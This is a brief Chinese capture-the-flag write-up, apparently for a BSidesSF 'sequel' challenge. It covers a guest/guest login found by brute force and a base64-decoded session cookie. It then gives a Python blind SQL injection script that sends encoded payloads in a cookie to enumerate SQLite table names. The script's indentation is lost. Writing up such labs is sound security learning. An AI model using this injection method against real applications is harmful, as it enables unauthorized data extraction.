进入后是一个登录页面
爆破之后的到帐号和密码都是guest
这里有个很隐晦的提示,Maybe the admin likes it too?
查看Cookie,使用base64解密
接下来使用cookie注入,使用大佬的脚本
import requests
import base64
import string
import sys
out = ""
while True:
for letter in string.printable:
tmp = out + letter
payload = r'{{"username":"\" OR EXISTS(SELECT name FROM sqlite_master WHERE name LIKE \"{}\" limit 1) OR \"","password":"guest"}}'.format(tmp + '%')
payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
r = requests.get('https://sequel-9cba4c8e.challenges.bsidessf.net/sequels', cookies={"1337_AUTH" : payload})
if "Movie" in r.text:
out = tmp
sys.stdout.write(letter)
sys.stdout.flush()
break